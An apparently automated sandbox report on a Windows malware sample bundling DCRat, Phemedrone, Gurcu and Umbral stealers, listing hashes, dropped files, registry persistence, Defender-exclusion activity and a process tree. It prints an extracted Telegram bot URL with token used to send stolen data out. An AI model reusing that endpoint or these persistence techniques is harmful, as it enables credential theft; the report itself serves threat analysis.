dcrat | f679075808adffca9a26ade94cc8494ccc500333e8613708e9ba077d88d92a70

Analysis

max time kernel
149s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
06-12-2024 17:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Nonagon.exe
Size

23KB
MD5

1b554731ea6b94e44ab6fe7ec45eb153
SHA1

1849707450548f79b4f8d941745c2c72199a7f00
SHA256

f679075808adffca9a26ade94cc8494ccc500333e8613708e9ba077d88d92a70
SHA512

96880df0242f41380e2877a3cac119e14ab062c4892040a3d8c9fe5fbc58ee6681729d1a1ca5c62427d4ad5ca76be1167d8811e9b4c35656e0c1000d660c06c1
SSDEEP

384:LD5Ry1Yg5MsZHalPXhZAiWGVDNr2mtbQ2E65wMxsWSjRSiKM3EMtR:zymgSCh2Ey/GWSjRSiKM3Nt

Score

10^/10

dcrat gurcu phemedrone umbral credential_access discovery execution infostealer persistence rat spyware stealer

Malware Config

Extracted

Family

phemedrone

https://api.telegram.org/bot7940307483:AAEmmDBRKx8kRMTrlD986B7qCulYd2jfQHw/sendDocument

Extracted

Family

gurcu

https://api.telegram.org/bot7940307483:AAEmmDBRKx8kRMTrlD986B7qCulYd2jfQHw/sendDocumen

Signatures

DcRat 64 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

description	ioc	pid	Process
		2188	schtasks.exe
		4976	schtasks.exe
		2212	schtasks.exe
		2304	schtasks.exe
		4840	schtasks.exe
		3600	schtasks.exe
		1084	schtasks.exe
		4744	schtasks.exe
		3088	schtasks.exe
		4340	schtasks.exe
		1060	schtasks.exe
		416	schtasks.exe
		3616	schtasks.exe
		1120	schtasks.exe
		228	schtasks.exe
		2460	schtasks.exe
		3692	schtasks.exe
		2720	schtasks.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Nvidia = "C:\\Program Files\\WinRAR\\RarExtPackage.exe"		Nonagon.exe
		3852	schtasks.exe
		1984	schtasks.exe
		4664	schtasks.exe
		2288	schtasks.exe
		4316	schtasks.exe
		1260	schtasks.exe
		5004	schtasks.exe
		4756	schtasks.exe
		4256	schtasks.exe
		2024	schtasks.exe
		3776	schtasks.exe
		1752	schtasks.exe
		4264	schtasks.exe
		2392	schtasks.exe
		496	schtasks.exe
		1232	schtasks.exe
File created	C:\Windows\debug\PXm40rAQJNL1dLLc2xrFc0EDNV.bat		RarExtPackage.exe
		3064	schtasks.exe
		1472	schtasks.exe
		1384	schtasks.exe
		3336	schtasks.exe
		4648	schtasks.exe
		3732	schtasks.exe
		2308	schtasks.exe
		3432	schtasks.exe
		4836	schtasks.exe
		3192	schtasks.exe
		1576	schtasks.exe
		1812	schtasks.exe
		3168	schtasks.exe
		4544	schtasks.exe
		4056	schtasks.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\SystemCertificates\Root		Nonagon.exe
		3888	schtasks.exe
		2104	schtasks.exe
		3812	schtasks.exe
		3904	schtasks.exe
		1476	schtasks.exe
		4932	schtasks.exe
		1392	schtasks.exe
		3016	schtasks.exe
		1200	schtasks.exe
		3352	schtasks.exe
		232	schtasks.exe
		4500	schtasks.exe

Dcrat family
dcrat

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0003000000025c3a-36.dat	family_umbral
behavioral2/memory/5016-63-0x0000016FED280000-0x0000016FED2C0000-memory.dmp	family_umbral

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu
Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
Phemedrone family
phemedrone

Process spawned unexpected child process 64 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1812	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3732	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	232	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1476	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4768	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1752	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1260	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4976	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3888	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2104	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3292	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2212	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4932	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	228	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3852	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4744	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4500	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1392	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3064	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1984	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5004	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4796	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3088	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3348	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1612	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4340	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5056	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	876	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4756	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2304	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2308	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4256	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1472	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3016	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	416	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	480	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4840	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4664	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3168	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1232	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4732	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2024	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2872	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1060	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4544	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2588	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4264	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2460	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3776	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1200	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1384	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3812	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1308	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3600	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3080	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3432	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1084	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3336	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2392	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2584	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4836	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3192	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2188	1596	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3616	1596	schtasks.exe	85

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

DCRat payload 3 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral2/files/0x0005000000025b56-19.dat	dcrat
behavioral2/files/0x0003000000025ba1-151.dat	dcrat
behavioral2/memory/236-153-0x0000000000B30000-0x0000000000C22000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3992	powershell.exe
3456	powershell.exe
1404	powershell.exe
4300	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	wtf1.exe

Executes dropped EXE 7 IoCs

pid	Process
2464	RarExtPackage.exe
5016	wtf1.exe
4000	wtf.exe
3356	cs2.exe
236	DebugTracker.exe
800	DebugTracker.exe
4928	lsass.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	discord.com
17	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Modifies WinLogon 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Nvidia = "C:\\Program Files\\WinRAR\\RarExtPackage.exe"	Nonagon.exe

Drops file in Program Files directory 23 IoCs

description	ioc	Process
File created	C:\Program Files\Windows Photo Viewer\en-US\RuntimeBroker.exe	DebugTracker.exe
File created	C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\wininit.exe	DebugTracker.exe
File created	C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\56085415360792	DebugTracker.exe
File created	C:\Program Files\VideoLAN\OfficeClickToRun.exe	DebugTracker.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Configuration\dllhost.exe	DebugTracker.exe
File created	C:\Program Files (x86)\Windows NT\Accessories\ja-JP\29c1c3cc0f7685	DebugTracker.exe
File created	C:\Program Files\ModifiableWindowsApps\sppsvc.exe	DebugTracker.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\StartMenuExperienceHost.exe	DebugTracker.exe
File created	C:\Program Files (x86)\Google\Update\Offline\cfa885d449487c	DebugTracker.exe
File created	C:\Program Files\WinRAR\RarExtPackage.exe	Nonagon.exe
File created	C:\Program Files (x86)\Reference Assemblies\csrss.exe	DebugTracker.exe
File created	C:\Program Files\Uninstall Information\wininit.exe	DebugTracker.exe
File created	C:\Program Files (x86)\Windows NT\Accessories\ja-JP\unsecapp.exe	DebugTracker.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\55b276f4edf653	DebugTracker.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Configuration\5940a34987c991	DebugTracker.exe
File created	C:\Program Files\WindowsPowerShell\6203df4a6bafc7	DebugTracker.exe
File created	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_neutral_~_8wekyb3d8bbwe\microsoft.system.package.metadata\RuntimeBroker.exe	DebugTracker.exe
File created	C:\Program Files (x86)\Google\Update\Offline\SearchHost.exe	DebugTracker.exe
File created	C:\Program Files\VideoLAN\e6c9b481da804f	DebugTracker.exe
File created	C:\Program Files (x86)\Reference Assemblies\886983d96e3d3e	DebugTracker.exe
File created	C:\Program Files\Uninstall Information\56085415360792	DebugTracker.exe
File created	C:\Program Files\WindowsPowerShell\lsass.exe	DebugTracker.exe
File created	C:\Program Files\Windows Photo Viewer\en-US\9e8d7a4ca61bd9	DebugTracker.exe

Drops file in Windows directory 21 IoCs

description	ioc	Process
File opened for modification	C:\Windows\debug\wtf1.exe	attrib.exe
File created	C:\Windows\security\templates\6ccacd8608530f	DebugTracker.exe
File created	C:\Windows\debug\wtf1.exe	RarExtPackage.exe
File opened for modification	C:\Windows\debug\wtf1.exe	RarExtPackage.exe
File opened for modification	C:\Windows\debug\wtf.exe	RarExtPackage.exe
File opened for modification	C:\Windows\debug\cs2.exe	RarExtPackage.exe
File opened for modification	C:\Windows\debug\VUQLBafFd1oU7p3k.vbe	RarExtPackage.exe
File created	C:\Windows\debug\wtf.exe	RarExtPackage.exe
File opened for modification	C:\Windows\de-DE\sihost.exe	DebugTracker.exe
File opened for modification	C:\Windows\debug\PXm40rAQJNL1dLLc2xrFc0EDNV.bat	RarExtPackage.exe
File opened for modification	C:\Windows\debug\DebugTracker.exe	RarExtPackage.exe
File created	C:\Windows\debug\cs2.exe	RarExtPackage.exe
File created	C:\Windows\security\templates\Idle.exe	DebugTracker.exe
File created	C:\Windows\de-DE\sihost.exe	DebugTracker.exe
File created	C:\Windows\de-DE\66fc9ff0ee96c2	DebugTracker.exe
File created	C:\Windows\RemotePackages\RemoteDesktops\lsass.exe	DebugTracker.exe
File created	C:\Windows\RemotePackages\RemoteDesktops\6203df4a6bafc7	DebugTracker.exe
File created	C:\Windows\debug\__tmp_rar_sfx_access_check_240622437	RarExtPackage.exe
File created	C:\Windows\debug\PXm40rAQJNL1dLLc2xrFc0EDNV.bat	RarExtPackage.exe
File created	C:\Windows\debug\DebugTracker.exe	RarExtPackage.exe
File created	C:\Windows\debug\VUQLBafFd1oU7p3k.vbe	RarExtPackage.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RarExtPackage.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4328	cmd.exe
2200	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
700	wmic.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings	RarExtPackage.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings	lsass.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2200	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4756	schtasks.exe
1232	schtasks.exe
1060	schtasks.exe
4836	schtasks.exe
2720	schtasks.exe
2392	schtasks.exe
496	schtasks.exe
4768	schtasks.exe
2104	schtasks.exe
4744	schtasks.exe
1392	schtasks.exe
3064	schtasks.exe
3168	schtasks.exe
4732	schtasks.exe
4264	schtasks.exe
232	schtasks.exe
1612	schtasks.exe
5056	schtasks.exe
2304	schtasks.exe
3016	schtasks.exe
3336	schtasks.exe
3088	schtasks.exe
2460	schtasks.exe
3904	schtasks.exe
2308	schtasks.exe
2584	schtasks.exe
3812	schtasks.exe
3600	schtasks.exe
3692	schtasks.exe
1812	schtasks.exe
4932	schtasks.exe
228	schtasks.exe
4256	schtasks.exe
1200	schtasks.exe
5004	schtasks.exe
1472	schtasks.exe
2024	schtasks.exe
3352	schtasks.exe
1260	schtasks.exe
3888	schtasks.exe
2588	schtasks.exe
3192	schtasks.exe
2164	schtasks.exe
4056	schtasks.exe
3732	schtasks.exe
1476	schtasks.exe
4544	schtasks.exe
1308	schtasks.exe
3080	schtasks.exe
1084	schtasks.exe
3616	schtasks.exe
1576	schtasks.exe
3292	schtasks.exe
2212	schtasks.exe
3852	schtasks.exe
4796	schtasks.exe
876	schtasks.exe
416	schtasks.exe
480	schtasks.exe
1120	schtasks.exe
4648	schtasks.exe
4316	schtasks.exe
4664	schtasks.exe
3432	schtasks.exe

Suspicious behavior: EnumeratesProcesses 51 IoCs

pid	Process
4000	wtf.exe
4000	wtf.exe
4000	wtf.exe
4000	wtf.exe
4000	wtf.exe
4000	wtf.exe
4000	wtf.exe
4000	wtf.exe
4000	wtf.exe
4000	wtf.exe
3356	cs2.exe
5016	wtf1.exe
3992	powershell.exe
3992	powershell.exe
3456	powershell.exe
3456	powershell.exe
1404	powershell.exe
1404	powershell.exe
4668	powershell.exe
4668	powershell.exe
4300	powershell.exe
4300	powershell.exe
236	DebugTracker.exe
236	DebugTracker.exe
236	DebugTracker.exe
236	DebugTracker.exe
236	DebugTracker.exe
236	DebugTracker.exe
236	DebugTracker.exe
236	DebugTracker.exe
236	DebugTracker.exe
236	DebugTracker.exe
236	DebugTracker.exe
800	DebugTracker.exe
800	DebugTracker.exe
800	DebugTracker.exe
800	DebugTracker.exe
800	DebugTracker.exe
800	DebugTracker.exe
800	DebugTracker.exe
800	DebugTracker.exe
800	DebugTracker.exe
4928	lsass.exe
4928	lsass.exe
4928	lsass.exe
4928	lsass.exe
4928	lsass.exe
4928	lsass.exe
4928	lsass.exe
4928	lsass.exe
4928	lsass.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4928	lsass.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4000	wtf.exe
Token: SeDebugPrivilege	5016	wtf1.exe
Token: SeDebugPrivilege	3356	cs2.exe
Token: SeIncreaseQuotaPrivilege	972	wmic.exe
Token: SeSecurityPrivilege	972	wmic.exe
Token: SeTakeOwnershipPrivilege	972	wmic.exe
Token: SeLoadDriverPrivilege	972	wmic.exe
Token: SeSystemProfilePrivilege	972	wmic.exe
Token: SeSystemtimePrivilege	972	wmic.exe
Token: SeProfSingleProcessPrivilege	972	wmic.exe
Token: SeIncBasePriorityPrivilege	972	wmic.exe
Token: SeCreatePagefilePrivilege	972	wmic.exe
Token: SeBackupPrivilege	972	wmic.exe
Token: SeRestorePrivilege	972	wmic.exe
Token: SeShutdownPrivilege	972	wmic.exe
Token: SeDebugPrivilege	972	wmic.exe
Token: SeSystemEnvironmentPrivilege	972	wmic.exe
Token: SeRemoteShutdownPrivilege	972	wmic.exe
Token: SeUndockPrivilege	972	wmic.exe
Token: SeManageVolumePrivilege	972	wmic.exe
Token: 33	972	wmic.exe
Token: 34	972	wmic.exe
Token: 35	972	wmic.exe
Token: 36	972	wmic.exe
Token: SeIncreaseQuotaPrivilege	972	wmic.exe
Token: SeSecurityPrivilege	972	wmic.exe
Token: SeTakeOwnershipPrivilege	972	wmic.exe
Token: SeLoadDriverPrivilege	972	wmic.exe
Token: SeSystemProfilePrivilege	972	wmic.exe
Token: SeSystemtimePrivilege	972	wmic.exe
Token: SeProfSingleProcessPrivilege	972	wmic.exe
Token: SeIncBasePriorityPrivilege	972	wmic.exe
Token: SeCreatePagefilePrivilege	972	wmic.exe
Token: SeBackupPrivilege	972	wmic.exe
Token: SeRestorePrivilege	972	wmic.exe
Token: SeShutdownPrivilege	972	wmic.exe
Token: SeDebugPrivilege	972	wmic.exe
Token: SeSystemEnvironmentPrivilege	972	wmic.exe
Token: SeRemoteShutdownPrivilege	972	wmic.exe
Token: SeUndockPrivilege	972	wmic.exe
Token: SeManageVolumePrivilege	972	wmic.exe
Token: 33	972	wmic.exe
Token: 34	972	wmic.exe
Token: 35	972	wmic.exe
Token: 36	972	wmic.exe
Token: SeDebugPrivilege	3992	powershell.exe
Token: SeDebugPrivilege	3456	powershell.exe
Token: SeDebugPrivilege	1404	powershell.exe
Token: SeDebugPrivilege	4668	powershell.exe
Token: SeIncreaseQuotaPrivilege	3936	wmic.exe
Token: SeSecurityPrivilege	3936	wmic.exe
Token: SeTakeOwnershipPrivilege	3936	wmic.exe
Token: SeLoadDriverPrivilege	3936	wmic.exe
Token: SeSystemProfilePrivilege	3936	wmic.exe
Token: SeSystemtimePrivilege	3936	wmic.exe
Token: SeProfSingleProcessPrivilege	3936	wmic.exe
Token: SeIncBasePriorityPrivilege	3936	wmic.exe
Token: SeCreatePagefilePrivilege	3936	wmic.exe
Token: SeBackupPrivilege	3936	wmic.exe
Token: SeRestorePrivilege	3936	wmic.exe
Token: SeShutdownPrivilege	3936	wmic.exe
Token: SeDebugPrivilege	3936	wmic.exe
Token: SeSystemEnvironmentPrivilege	3936	wmic.exe
Token: SeRemoteShutdownPrivilege	3936	wmic.exe

Suspicious use of WriteProcessMemory 51 IoCs

description	pid	Process	procid_target
PID 4928 wrote to memory of 2464	4928	Nonagon.exe	78
PID 4928 wrote to memory of 2464	4928	Nonagon.exe	78
PID 4928 wrote to memory of 2464	4928	Nonagon.exe	78
PID 2464 wrote to memory of 4260	2464	RarExtPackage.exe	79
PID 2464 wrote to memory of 4260	2464	RarExtPackage.exe	79
PID 2464 wrote to memory of 4260	2464	RarExtPackage.exe	79
PID 2464 wrote to memory of 5016	2464	RarExtPackage.exe	80
PID 2464 wrote to memory of 5016	2464	RarExtPackage.exe	80
PID 2464 wrote to memory of 4000	2464	RarExtPackage.exe	83
PID 2464 wrote to memory of 4000	2464	RarExtPackage.exe	83
PID 2464 wrote to memory of 3356	2464	RarExtPackage.exe	84
PID 2464 wrote to memory of 3356	2464	RarExtPackage.exe	84
PID 5016 wrote to memory of 972	5016	wtf1.exe	86
PID 5016 wrote to memory of 972	5016	wtf1.exe	86
PID 5016 wrote to memory of 1476	5016	wtf1.exe	91
PID 5016 wrote to memory of 1476	5016	wtf1.exe	91
PID 5016 wrote to memory of 3992	5016	wtf1.exe	93
PID 5016 wrote to memory of 3992	5016	wtf1.exe	93
PID 5016 wrote to memory of 3456	5016	wtf1.exe	95
PID 5016 wrote to memory of 3456	5016	wtf1.exe	95
PID 5016 wrote to memory of 1404	5016	wtf1.exe	97
PID 5016 wrote to memory of 1404	5016	wtf1.exe	97
PID 5016 wrote to memory of 4668	5016	wtf1.exe	99
PID 5016 wrote to memory of 4668	5016	wtf1.exe	99
PID 5016 wrote to memory of 3936	5016	wtf1.exe	101
PID 5016 wrote to memory of 3936	5016	wtf1.exe	101
PID 5016 wrote to memory of 496	5016	wtf1.exe	103
PID 5016 wrote to memory of 496	5016	wtf1.exe	103
PID 5016 wrote to memory of 3844	5016	wtf1.exe	105
PID 5016 wrote to memory of 3844	5016	wtf1.exe	105
PID 5016 wrote to memory of 4300	5016	wtf1.exe	107
PID 5016 wrote to memory of 4300	5016	wtf1.exe	107
PID 5016 wrote to memory of 700	5016	wtf1.exe	109
PID 5016 wrote to memory of 700	5016	wtf1.exe	109
PID 5016 wrote to memory of 4328	5016	wtf1.exe	113
PID 5016 wrote to memory of 4328	5016	wtf1.exe	113
PID 4328 wrote to memory of 2200	4328	cmd.exe	115
PID 4328 wrote to memory of 2200	4328	cmd.exe	115
PID 4260 wrote to memory of 4628	4260	WScript.exe	116
PID 4260 wrote to memory of 4628	4260	WScript.exe	116
PID 4260 wrote to memory of 4628	4260	WScript.exe	116
PID 4628 wrote to memory of 236	4628	cmd.exe	118
PID 4628 wrote to memory of 236	4628	cmd.exe	118
PID 236 wrote to memory of 800	236	DebugTracker.exe	152
PID 236 wrote to memory of 800	236	DebugTracker.exe	152
PID 800 wrote to memory of 4928	800	DebugTracker.exe	198
PID 800 wrote to memory of 4928	800	DebugTracker.exe	198
PID 4928 wrote to memory of 232	4928	lsass.exe	199
PID 4928 wrote to memory of 232	4928	lsass.exe	199
PID 4928 wrote to memory of 3932	4928	lsass.exe	200
PID 4928 wrote to memory of 3932	4928	lsass.exe	200

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1476	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Nonagon.exe
"C:\Users\Admin\AppData\Local\Temp\Nonagon.exe"
1⤵
- DcRat
- Modifies WinLogon
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4928
- C:\Program Files\WinRAR\RarExtPackage.exe
  "C:\Program Files\WinRAR\RarExtPackage.exe"
  2⤵
  - DcRat
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2464
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Windows\debug\VUQLBafFd1oU7p3k.vbe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4260
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Windows\debug\PXm40rAQJNL1dLLc2xrFc0EDNV.bat" "
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4628
    - - C:\Windows\debug\DebugTracker.exe
        
        "C:\Windows\debug\DebugTracker.exe"
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:236
      - C:\Windows\debug\DebugTracker.exe
        
        "C:\Windows\debug\DebugTracker.exe"
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:800
        
        C:\Program Files\WindowsPowerShell\lsass.exe
        
        "C:\Program Files\WindowsPowerShell\lsass.exe"
        7⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of WriteProcessMemory
        
        PID:4928
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6cf2fb8f-9134-4593-8cac-c946e2e19151.vbs"
        8⤵
        
        PID:232
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e47e9ff1-56bc-4075-91da-f8a43830d8df.vbs"
        8⤵
        
        PID:3932
- - C:\Windows\debug\wtf1.exe
    "C:\Windows\debug\wtf1.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
